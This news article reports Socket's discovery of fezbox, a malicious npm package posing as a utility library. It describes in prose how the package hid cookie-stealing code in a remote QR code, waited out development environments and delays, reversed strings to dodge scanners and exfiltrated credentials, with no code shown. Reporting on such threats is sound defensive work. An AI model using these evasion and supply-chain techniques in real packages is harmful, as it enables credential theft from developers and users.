QR codes become the vehicle for malware in new technique

QR codes are ubiquitous these days, as they are an easy way to deliver marketing content or direct users to websites and apps.

They have also become a hiding place for malicious code.

A threat research team at cybersecurity company Socket has discovered what it called “a sophisticated backdoor mechanism” that, when incorporated into an enterprise’s app or website, steals passwords stored in visitors’ cookies via code embedded in QR codes.

The malicious package, fezbox, is disguised as a utility library and has “layers of obfuscation” including the “innovative, steganographic use” of QR codes. Steganography involves embedding secret data into a cover medium so that it goes undetected.

“Steganography is the practice of hiding a secret file in plain sight, something for which QR codes are great,” wrote Socket researcher Olivia Brown. “The use of a QR code for further obfuscation is a creative twist by the threat actor.”

Hiding within seemingly meaningless code

The package exploits npm, the popular package manager for JavaScript, and features three layers of obfuscation: a reversed string, a QR code, and a hidden payload. The sophisticated malware delivery mechanism harvests user names and passwords from browser cookies, using code concealed in an embedded QR code that is particularly data dense and difficult to read.

Fezbox claims to be a JavaScript/TypeScript utility library of “common helper functions,” organized into feature modules so users could pick and choose. Its README file, written in Chinese, includes the phrases “TypeScript types,” “high performance,” and “tests,” and describes a QR code module that could generate and analyze codes and auto-load necessary program components.

However, it didn’t mention that simply importing the library kicked off a backend process that retrieved and ran code hidden within a remote QR code image.

The code is minified (compressed) and hidden in larger blocks of seemingly benign “no-operation (no-op)” instructions that allow it to bypass security checks. A specific condition within the code checks whether the app is running in a development environment; if it is, “the code does nothing,” Brown explained, noting that this is a typical stealth tactic.

“The threat actor does not want to risk being caught in a virtual environment or any non-production environment, so they may often add guardrails around when and how their exploit runs,” she wrote.

After a 120-second delay, the package then downloads and executes code from a QR image.

That code reads a cookie from “document.cookie,” retrieves the username and password from it, if they exist, then reverses the string (so “password” became “drowssap”). Reversing is a “classic anti-analysis stealth trick,” Brown noted, as it can bypass analysis tools that look for URLs, but not necessarily their backwards versions.

If the cookie contains both username and password, the package exfiltrates it via an HTTPS POST command; otherwise it “does nothing and exits quietly,” Brown explained.

While main utility functions appeared legitimate, the obfuscated pattern “represents a critical security threat enabling remote code execution with stealth characteristics,” Brown wrote. However, she noted that most apps no longer store passwords in cookies, so it’s difficult to determine how successful the malware might be.

A ‘noteworthy escalation’

The package has been removed from GitHub and listed as malicious. But it is indicative of a wider exploitation of QR codes and audio and video files by threat actors who are getting ever more stealthy with their techniques. By hiding executable code inside a QR code, attackers are taking advantage of developer confidence in QR parsing tools.

“We made QR codes ubiquitous during the pandemic and we can’t put that genie back in the bottle,” said David Shipley of Beauceron Security. “Attackers are getting clever with these latest attacks and there’s no sign they’re going away anytime soon.”

This is a “noteworthy escalation,” he said, urging devs to be aware that threat actors are looking to go after their valuable secrets, too. While it’s long been easy to phish everyday people, when criminals can phish developers, “they’ll never go hungry for credentials again.”

“For security and developer teams, the key here is a security culture that teaches coders to be careful and makes sure humans are in the review process at all times,” Shipley advised.